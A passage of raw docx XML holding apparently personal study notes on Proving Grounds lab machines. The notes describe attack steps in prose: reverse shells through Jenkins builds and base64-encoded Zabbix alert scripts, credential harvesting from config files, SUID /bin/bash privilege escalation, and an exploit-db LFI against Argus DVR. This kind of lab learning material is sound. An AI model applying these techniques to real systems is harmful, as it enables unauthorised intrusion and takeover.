      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once we had credentials, we could use the Jenkins website to create "new builds" and we can inject code to those builds, like reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4399156" cy="3757613"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="191" name="image192.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image192.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1365"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4399156" cy="37576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85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create new build</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4167188" cy="3475948"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="66" name="image73.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image73.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1366"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4167188" cy="34759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87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put in rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4731327" cy="3252788"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="457" name="image438.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image438.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1367"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4731327" cy="3252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89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Build it </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then start listener and you should have root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this didn't work, since we have shell from earlier, we could try many alternate methods like giving our user all sudo, or making /bin/bash with SUID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1424"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOPlanning was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1368">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BitForge</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG practice but it was a pretty long process since it took a long time to get credentials which were needed for RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zabbix from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1369">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zab</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG practice was a legit service that was seen in the running processes via pspy64 but also it has ports on port 10050 and 10051 that were only listening on local host. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was a really long attack. We first had to search up the Zabbix config file location which was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usr/share/zabbix/ui/conf/zabbix.conf.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then those creds were used in mysql to get creds for Zabbix website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once inside of Zabbix website, we could upload reverse shell Alert scripts and then using monitoring to trigger the script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But it didn't work probably because it detected our rev shell so we had to use base64 encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="673100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="492" name="image470.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image470.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1370"/>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3A96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5495925" cy="3505200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="233" name="image235.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image235.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1371"/>
                    <a:srcRect b="0" l="0" r="7532" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="54959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3A97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it finally worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A98">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A99">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A9A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5181600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="283" name="image278.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image278.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1372"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="518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9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this FTP server, we saw website source code, and then this really weird file name. So we were supposed to infer that this was a webpage too, and try accessing that endpoint, and we got creds from it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId1373">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SpiderSociety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A9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="992"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FileZilla 0.9.41 beta was mentioned to be seen a lot but never exploited</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="992"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1374">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@Dpsypher/proving-grounds-practice-slort-2294f5ddde5b</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Argus Surveillance DVR 4.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1375">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DVR4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG practice (Windows). First, they used an exploit from exploitDB to get LFI, which they used to get SSH key. The found the username through the website which they used to guess the location of the SSH key. And then they used a second exploit to decrypt a special Argus Survelliance password stored in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to find the password for the Administrator </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1376">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good writeup which is longer but it provides a list of special characters to try and guess what it is since the password crack said the last character was "unknown"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Special characters list: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">!@#$%^&amp;*()?_-+=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1377">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/45296</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="227"/>
